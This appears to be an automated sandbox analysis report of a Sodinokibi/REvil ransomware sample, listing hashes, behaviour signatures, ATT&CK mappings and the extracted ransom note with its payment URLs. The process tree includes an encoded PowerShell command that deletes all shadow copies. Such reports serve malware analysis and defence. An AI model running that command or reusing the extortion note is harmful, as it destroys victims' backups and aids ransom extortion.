Analysis

  • max time kernel
    186s
  • max time network
    142s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:02

General

  • Target

    cd3c9f9b3c229e43f1d0ab80b633d3ccb0579c704eb879f36436d65d3644e1e5.exe

  • Size

    156KB

  • MD5

    eb0199fd4efa42215a0866778d96ee39

  • SHA1

    0a94e9d10afccd30e6295e00b7846e382741bfbc

  • SHA256

    cd3c9f9b3c229e43f1d0ab80b633d3ccb0579c704eb879f36436d65d3644e1e5

  • SHA512

    0f2a9d03db06e1fcaa10f6f3c2410b9ffdb6c4234bca07c37c578e5e684cf86a9eae6a3bbb98170dc7868640521c89433563915e16a870b64785e63195d9d178

Malware Config

Extracted

Path

C:\2soudxn-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 2soudxn. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2A79FDD3164C95E2 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/2A79FDD3164C95E2 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: TglqeYSaL7bkDa2t/uL8aVxxvrMsCclHoyDLwkGc/QeK26yZxLumNhgj751Pk7If PLQu2ghkClSvmrkEFpfh8CWI/90Z3t3k2DHiO9lb9J5a5pH31tiRd3UV9+/pcfd1 ufyhs1Gze9crVVgxRDMr7Q/i8B14aXYkaFsaq8RFPSSz3SID1SdJROXQs7cr47q7 rKTigkrT/M19nvu5AgNOlMibcCNGad+v114C0KJExw0Oue1DqKyqObT5W/jOQQE2 CY2Ps/aVtPB4w+WTic8WysTW0xVZfBKwxl+fBufBht77JfmFf7jr1MzbRkG4N+si 55fRruaOxX7cS/WdAPzkv+kHZeZRrHeV8YHwbjeWqsEB4hqC9dQT2fgdc4ehG2K2 Bc6oWo1BKaXUyn2pmLXcF8jB0kNAfHfDF7My2tzT7yMPYqEiRXV5Jp7bmOrr0lYY ytSjH1LcsmKq/gwJ4Crqd3bcAZNp/Km2pzswPGDVn1qNJOXW8eExPHP9Hbf2+Hwe ri8xtB5T2guo4+Z2t6FSWjd+lQHzc39xWyw6frs8rSlcsidKmplaJop1yrd+xarU 6XK+hsGR9Qtv4PLj0h1oZ3iskituWLxoFjXGib68mXycapRI1CdvnDoDEPV52wD9 yLUEmRbFwkWBaoBIVrpO0TMp8tu08CIrg7U50pt6dtuTAMsbPSkv5fwWuOG4ZyKH 2B2cXl7niPe/yUOx1GPC+LOSUkV1kaKddkUwQwp5fPIWl3Rn96734ZRiIKBawEmf UBwcDH+TncmuNJnyPfEawcGmqlAMWxx+Hryl2D/FlXxsZJfIpbwNDdntndy1NGV7 nFzc9mNcyHKh68DJ4BS4+pFp0TicPfECGnwRXBWjTQsZYDjzfAZmDDajNHy1h9zO nC9Alu2i1YBnVZMuTLEGjJdUtQ+V4uVLeisSQHYKMowz/vafJAhtUmcUOf1rcK5x Qdshxf5Hz2IIu7TKkVCr5u9NbvujTVTj8EBk/u41F1RmUOpLpsXdPHUahN+jXN+i 7LZaFLSbGMz4kQPDn9o4jM/CvO6B/rbVYCqyhcSNJ622EJCsOW23kWPWIsdGk3Qs rGGGN9fAVRQk8LjXhVHDtDcrgr8YAbUpv/U/Ze7oXNJGP1axkMbYpGU60FrHYP5O JKnXAAWld2d9gfkm1zc5M82+ptBHLKQww3YHjT4uOcWEOfdjkBg0pu8V5gHt6RBH KxK+oWkXQpTwqc7HRzDTAVi5JSV+oiuO7MubPDILkwR0viyJIX89SEShgMv1aJpx 1o7er3vV/fh4yaqH9qcHANcJ Extension name: 2soudxn ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2A79FDD3164C95E2

http://decryptor.cc/2A79FDD3164C95E2

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cd3c9f9b3c229e43f1d0ab80b633d3ccb0579c704eb879f36436d65d3644e1e5.exe
    "C:\Users\Admin\AppData\Local\Temp\cd3c9f9b3c229e43f1d0ab80b633d3ccb0579c704eb879f36436d65d3644e1e5.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3276
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1920
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:984

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3276-122-0x000001EAF03A0000-0x000001EAF03A2000-memory.dmp
      Filesize

      8KB

    • memory/3276-123-0x000001EAF03A3000-0x000001EAF03A5000-memory.dmp
      Filesize

      8KB

    • memory/3276-124-0x000001EAF0200000-0x000001EAF0222000-memory.dmp
      Filesize

      136KB

    • memory/3276-127-0x000001EAF0530000-0x000001EAF05A6000-memory.dmp
      Filesize

      472KB